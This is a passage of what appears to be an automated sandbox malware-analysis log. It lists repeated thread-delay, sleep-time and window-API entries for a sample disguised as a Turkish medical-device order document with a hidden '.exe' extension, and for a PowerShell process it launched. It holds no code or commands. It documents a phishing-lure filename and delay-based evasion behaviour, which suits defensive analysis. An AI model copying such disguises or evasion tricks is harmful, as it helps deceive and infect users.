                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596422Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596312Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596094Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595984Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595875Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595766Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595641Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595516Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595406Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595297Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595188Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595063Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594938Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594719Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594594Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 611Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 3238Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5517Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1599Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 2243Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 7609Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow / User API: foregroundWindowGot 1770Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -239813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -239688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -239570s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -239422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -239298s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -239063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -238934s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -238825s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -238719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -238594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -238484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -238375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -238266s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -238156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -238047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -237938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -237828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -237696s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -237578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5412Thread sleep time: -237453s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5140Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1824Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5864Thread sleep count: 2243 > 30Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -599891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5864Thread sleep count: 7609 > 30Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -599781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -599672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -599562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -599453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -599344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -599109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -599000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -598890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -598672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -598562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -598344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -598234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -598125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -598016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -597891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -597766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -597656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -597547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -597437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -597328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -597219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -597109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -597000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -596891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -596766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -596641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -596531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -596422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -596312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -596203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -596094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -595984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -595875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -595766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -595641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -595516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -595406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -595297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -595188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -595063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -594938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -594828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -594719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -594594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 5656Thread sleep time: -594484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239813Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239688Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239570Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239422Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239298Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239063Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238934Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238825Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238719Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238594Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238484Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238375Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238266Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238156Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238047Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237938Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237828Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237696Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237578Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237453Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598016Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597891Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597656Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597547Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596891Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596766Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596641Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596422Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596312Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596094Jump to behavior
